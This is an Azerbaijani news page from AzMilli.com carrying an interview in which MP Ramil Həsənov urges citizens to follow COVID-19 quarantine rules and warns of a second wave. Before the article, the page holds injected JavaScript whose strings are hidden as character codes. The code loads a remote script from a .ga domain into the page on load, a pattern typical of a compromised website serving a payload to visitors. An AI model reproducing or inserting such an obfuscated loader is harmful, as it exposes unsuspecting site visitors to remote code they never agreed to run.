Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Ramil Həsənov: “Covid-19 ikinci dalğasının…” - AzMilli.com

Ramil Həsənov: “Covid-19 ikinci dalğasının…”

Ramil Həsənov: “Covid-19 ikinci dalğasının…”

“Xəstələrin sayı 4 milyon yarımı ötüb”.

Bu sözləri millət vəkili Ramil Həsənov yeni karantin qaydaları haqda Azmilli.com saytına danışarkən, deyib:

“Bildiyiniz kimi bu gün COVİD-19 virusuna yoluxan insanların sayı 4 milyon yarımı keçib. Təxminən 4 milyon 600-dən bir qədər yuxarıdır. Bu virus nəticəsində dünyasını dəyişənlərin sayı isə yarım milyon civarındadır. Bütün bu faktlar onu göstərir ki, COVİD-19 virusu bütün dünya üçün ciddi bir siqanal olaraq, hələ də qalmaqdadır. Əlbəttə ki, bütün Avropa ölkələri, Asya ölkələri o cümlədən, Azərbaycanda bu virusla bağlı başlatdıqları, təcrid prosesindən hissə-hissə çıxmaq üçün addımlar atmaqdadır. İnsanların ən maksimal qorunaraq, ən minimal zərərlə bu vəziyyətdən çıxması üçün Azərbaycan hökümətinin, başda cənab prezident İlham Əliyevin bilavasitə başçılığı və vermiş olduğu xüsusi təlimat çərçivəsində, atılan addımlar, insanlarımızın bu problemdən, qısa müddətdə qurtulmasına və COVİD-19 pandemiyasının yayılma terektoriyasının azalmasına xidmət etməkdədir. Bildiyiniz kimi, 18 maydan etibarən, parklar, restoranlar, müzeylər, kitabxanalar, müəyyən müəssələr açılmasına baxmayaraq, xəstələnənlərin sayı artmaqda davam edir. Burada məsuliyyət bilavasitə vətəndaşların üzərinə düşməkdədir. Çünki dövlət başçısının, vermiş olduğu tapşırığa əsasən uğurla fəaliyyət göstərən Nazirlər Kabineti yanında operativ qərargah, və o cümlədəb Təbib və bir çox qurumlar öz üzərlərinə düşən uğurlu atmaqda və vətəndaşlarımızın sağlamlığının keşiyində uğurla durmaqdadırlar. Amma vətandaşlarımızda, yaşından, sosial vəziyyətindən və cəmiyyətdə tutduqları, mövqelərdən asılı olmayaraq, sosial məsafəni qorumalı və eyni zamanda pandemiyaya qarşı hökümətin tətbiq etmiş olduğu, qaydalara riyayyət etməlidirlər. Bu qaydaların içərisində 18 maydan etibarən, fəaliyyətə başlayan iaşə müəssələridə gigyenik qaydalara riyayyət etməli həmçinin vətəndaşları da bu qaydalara riyayyət etməyə səsləməlidir. Bu qaydaların içərisində maskalardan istifadə edilməsidir, əllərin tez-tez gigyenik vasitələrlə dizinfeksiya edilməsidir, restoranlarda sosial məsafələrə uyğun stollar qoyulması və stolların hər birində gigyenik vasitələrin olmasıdır. Bu kimi amillər və eyni zamanda parkda 10 nəfərdən artıq gəzilməməsi haqda hökümətin vermiş olduğu qaydalara ciddi riyayyət edilməsidir. Bütün bu qaydalar hamısı mütləq şəkildə vətəndaşlarımız tərəfindən, yerinə gətirilməlidir. Əksi təqdirdə cənab prezidentin də dəfələrlə qeyd etdiyi kimi yumşaldılan qaydalar davam edən proseslərə bağlı olacaq. Əgər proseslər yüksələn xətlə davam edərsə, yəni xəstələrin sayı davam edərsə, əlbəttə ki, qaydalar yenidən sərtləşdirilə bilər. Və məlum olduğu kimi dünya mütəxəssisləri, xüsusi ilə Dünya Səhiyyə təşkilatının açıqladığı kimi pandemiyanın ikinci dalğasının gəlmə ehtimalı hələ də qalmaqdadır. Və bu ehtimal ünsiyyət zamanı sosial məsafə saxlayıb, saxlamaması və qoyulan tələbləri yerinə yetirib, yetirməməsindən asılı olacaqdır. Bu bağlamda biz əlbəttə ki, yenidən qaydaların sərtləşməsini, insanların evdə oturmasını, alışmış olduğumuz, rutin həyata dönməmizlə bağlı müəyyən məhdudiyyətlər olmasını istəmiriksə, o zaman mən də bir vətəndaş kimi, bir millət vəkili kimi, ölkə rəhbərinin cənab prezidentin çağırışlarına, hörmətli birinci vitse-prezidentimizin, bir neçə dəfə həm birinci vitse-prezident olaraq, həm də ölkəmizin birinci xanımı, bir ana olaraq vermiş olduğu məsləhətlərə, əməl etməyə çağırırıq. Və hökümətin vermiş olduğu qərarları, atmış olduğu addımları, açıq və aydın şəkildə dərk edib, həm tətbiq etmələrini həm də bunu bir maarifləndirici informasiya kimi ətrafındakı insanlara yaymağını tövsiyyə edirik. Əgər belə edərsək, düşmüş olduğumuz bu problemlərdən, bir an öncə qurtula bilərik. Bu həm bizim ölkəmizin yenidən, sabit, stabil, rutin olduğu dövrə qayıtmasına kömək edəcək, həm də insanların rahat nəfəs alması, sağalanların sayının artmasına gətirib çıxaradacaq. Və ümumiyyətlə pandemiyaya qarşı qəti bir qələbə qazanmağımıza kömək edə bilər. Buna görə də fürsətdən istifadə edərək, Dünya Səhiyyə təşkilatının və Azərbaycan hökümətinin buna uyğun olaraq, vermiş olduğu qərarlara yəni Nazirlər Kabinetinin yanında fəaliyyət göstərən operativ qəraragahın verdiyi qərarlara hər bir vətandaşımızın harada yaşamasından, asılı olmayaraq çağırıram. Və əminəm ki, cənab prezidentin xalqa etdiyi çağırışlara diqqətlə yanaşacağıq və inşallah bu bəladan çox qısa bir müddətdə birlikdə çıxacağıq”.

Azmilli.com

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *